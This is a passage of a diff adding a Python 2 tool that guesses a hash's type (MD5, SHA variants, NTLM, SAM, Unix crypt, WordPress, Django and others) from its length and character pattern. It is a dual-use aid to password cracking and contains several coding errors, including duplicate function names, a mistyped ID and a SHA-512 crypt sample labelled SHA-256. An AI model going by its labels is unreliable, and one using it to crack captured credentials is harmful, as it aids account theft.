"106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105020") + + def DomainCachedCredentials(): + hs='f42005ec1afe77967cbc83dce1b4d714' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106025") + def Haval128(): + hs='d6e3ec49aa0f138a619f27609022df10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106160") + def Haval128HMAC(): + hs='3ce8b0ffd75bc240fc7d967729cd6637' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106165") + def MD2(): + hs='08bbef4754d98806c373f2cd7d9a43c4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106060") + def MD2HMAC(): + hs='4b61b72ead2b0eb0fa3b8a56556a6dca' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106120") + def MD4(): + hs='a2acde400e61410e79dacbdfc3413151' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106040") + def MD4HMAC(): + hs='6be20b66f2211fe937294c1c95d1cd4f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106100") + def MD5(): + hs='ae11fd697ec92c7c98de3fac23aba525' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106020") + def MD5HMAC(): + hs='d57e43d2c7e397bf788f66541d6fdef9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106080") + def MD5HMACWordpress(): + hs='3f47886719268dfa83468630948228f6' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106140") + def NTLM(): + hs='cc348bace876ea440a28ddaeb9fd3550' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106029") + def RAdminv2x(): + hs='baea31c728cbf0cd548476aa687add4b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106027") + def RipeMD128(): + hs='4985351cd74aff0abc5a75a0c8a54115' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106180") + def RipeMD128HMAC(): + hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106185") + def SNEFRU128(): + hs='4fb58702b617ac4f7ca87ec77b93da8a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106200") + def SNEFRU128HMAC(): + hs='59b2b9dcc7a9a7d089cecf1b83520350' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106205") + def Tiger128(): + hs='c086184486ec6388ff81ec9f23528727' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106220") + def Tiger128HMAC(): + hs='c87032009e7c4b2ea27eb6f99723454b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106225") + def md5passsalt(): + hs='5634cc3b922578434d6e9342ff5913f7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106240") + def md5saltmd5pass(): + hs='245c5763b95ba42d4b02d44bbcd916f1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106260") + def md5saltpass(): + hs='22cc5ce1a1ef747cd3fa06106c148dfa' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106280") + def md5saltpasssalt(): + hs='469e9cdcaff745460595a7a386c4db0c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106300") + def md5saltpassusername(): + hs='9ae20f88189f6e3a62711608ddb6f5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106320") + def md5saltmd5pass(): + hs='aca2a052962b2564027ee62933d2382f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106340") + def md5saltmd5passsalt(): + hs='de0237dc03a8efdf6552fbe7788b2fdd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106360") + def md5saltmd5passsalt(): + hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106380") + def md5saltmd5saltpass(): + hs='d8f3b3f004d387086aae24326b575b23' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106400") + def md5saltmd5md5passsalt(): + hs='81f181454e23319779b03d74d062b1a2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106420") + def md5username0pass(): + hs='e44a60f8f2106492ae16581c91edb3ba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106440") + def md5usernameLFpass(): + hs='654741780db415732eaee12b1b909119' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106460") + def md5usernamemd5passsalt(): + hs='954ac5505fd1843bbb97d1b2cda0b98f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106480") + def md5md5pass(): + hs='a96103d267d024583d5565436e52dfb3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106500") + def md5md5passsalt(): + hs='5848c73c2482d3c2c7b6af134ed8dd89' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106520") + def md5md5passmd5salt(): + hs='8dc71ef37197b2edba02d48c30217b32' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106540") + def md5md5saltpass(): + hs='9032fabd905e273b9ceb1e124631bd67' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106560") + def md5md5saltmd5pass(): + hs='8966f37dbb4aca377a71a9d3d09cd1ac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106580") + def md5md5usernamepasssalt(): + hs='4319a3befce729b34c3105dbc29d0c40' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106600") + def md5md5md5pass(): + hs='ea086739755920e732d0f4d8c1b6ad8d' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106620") + def md5md5md5md5pass(): + hs='02528c1f2ed8ac7d83fe76f3cf1c133f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106640") + def md5md5md5md5md5pass(): + hs='4548d2c062933dff53928fd4ae427fc0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106660") + def md5sha1pass(): + hs='cb4ebaaedfd536d965c452d9569a6b1e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106680") + def md5sha1md5pass(): + hs='099b8a59795e07c334a696a10c0ebce0' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106700") + def md5sha1md5sha1pass(): + hs='06e4af76833da7cc138d90602ef80070' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106720") + def md5strtouppermd5pass(): + hs='519de146f1a658ab5e5e2aa9b7d2eec8' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("106740") + + def LineageIIC4(): + hs='0x49a57f66bd3d5ba6abda5579c264a0e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: + jerar.append("107080") + def MD5phpBB3(): + hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: + jerar.append("107040") + def MD5Unix(): + hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: + jerar.append("107060") + def MD5Wordpress(): + hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: + jerar.append("107020") + + def MD5APR(): + hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: + jerar.append("108020") + + def Haval160(): + hs='a106e921284dd69dad06192a4411ec32fce83dbb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109100") + def Haval160HMAC(): + hs='29206f83edc1d6c3f680ff11276ec20642881243' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109200") + def MySQL5(): + hs='9bb2fb57063821c762cc009f7584ddae9da431ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109040") + def MySQL160bit(): + hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: + jerar.append("109060") + def RipeMD160(): + hs='dc65552812c66997ea7320ddfb51f5625d74721b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109120") + def RipeMD160HMAC(): + hs='ca28af47653b4f21e96c1235984cb50229331359' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109180") + def SHA1(): + hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109020") + def SHA1HMAC(): + hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109140") + def SHA1MaNGOS(): + hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109220") + def SHA1MaNGOS2(): + hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109240") + def Tiger160(): + hs='c086184486ec6388ff81ec9f235287270429b225' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109080") + def Tiger160HMAC(): + hs='6603161719da5e56e1866e4f61f79496334e6a10' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109160") + def sha1passsalt(): + hs='f006a1863663c21c541c8d600355abfeeaadb5e4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109260") + def sha1saltpass(): + hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109280") + def sha1saltmd5pass(): + hs='860465ede0625deebb4fbbedcb0db9dc65faec30' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109300") + def sha1saltmd5passsalt(): + hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109320") + def sha1saltsha1pass(): + hs='58714327f9407097c64032a2fd5bff3a260cb85f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109340") + def sha1saltsha1saltsha1pass(): + hs='cc600a2903130c945aa178396910135cc7f93c63' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109360") + def sha1usernamepass(): + hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109380") + def sha1usernamepasssalt(): + hs='00025111b3c4d0ac1635558ce2393f77e94770c5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109400") + def sha1md5pass(): + hs='fa960056c0dea57de94776d3759fb555a15cae87' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("1094202") + def sha1md5passsalt(): + hs='1dad2b71432d83312e61d25aeb627593295bcc9a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109440") + def sha1md5sha1pass(): + hs='8bceaeed74c17571c15cdb9494e992db3c263695' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109460") + def sha1sha1pass(): + hs='3109b810188fcde0900f9907d2ebcaa10277d10e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109480") + def sha1sha1passsalt(): + hs='780d43fa11693b61875321b6b54905ee488d7760' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109500") + def sha1sha1passsubstrpass03(): + hs='5ed6bc680b59c580db4a38df307bd4621759324e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109520") + def sha1sha1saltpass(): + hs='70506bac605485b4143ca114cbd4a3580d76a413' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109540") + def sha1sha1sha1pass(): + hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109560") + def sha1strtolowerusernamepass(): + hs='79f575543061e158c2da3799f999eb7c95261f07' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("109580") + + def Haval192(): + hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110040") + def Haval192HMAC(): + hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110080") + def Tiger192(): + hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110020") + def Tiger192HMAC(): + hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("110060") + + def MD5passsaltjoomla1(): + hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("112020") + + def SHA1Django(): + hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: + jerar.append("113020") + + def Haval224(): + hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114040") + def Haval224HMAC(): + hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114080") + def SHA224(): + hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114020") + def SHA224HMAC(): + hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("114060") + + def SHA256(): + hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115020") + def SHA256HMAC(): + hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115120") + def Haval256(): + hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115040") + def Haval256HMAC(): + hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115140") + def GOSTR341194(): + hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115060") + def RipeMD256(): + hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115080") + def RipeMD256HMAC(): + hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115160") + def SNEFRU256(): + hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115100") + def SNEFRU256HMAC(): + hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115180") + def SHA256md5pass(): + hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115200") + def SHA256sha1pass(): + hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("115220") + + def MD5passsaltjoomla2(): + hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: + jerar.append("116020") + def SAM(): + hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: + jerar.append("116040") + + def SHA256Django(): + hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: + jerar.append("117020") + + def RipeMD320(): + hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118020") + def RipeMD320HMAC(): + hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("118040") + + def SHA384(): + hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119020") + def SHA384HMAC(): + hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("119040") + + def SHA256s(): + hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: + jerar.append("120020") + + def SHA384Django(): + hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: + print " [+] SHA-384(Django)" + jerar.append("121020") + + def SHA512(): + hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122020") + def SHA512HMAC(): + hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122060") + def Whirlpool(): + hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122040") + def WhirlpoolHMAC(): + hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("122080") + + + print logo + while True: + jerar=[] + print """ + -------------------------------------------------------------------------""" + hash = raw_input(" HASH: ") + ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); 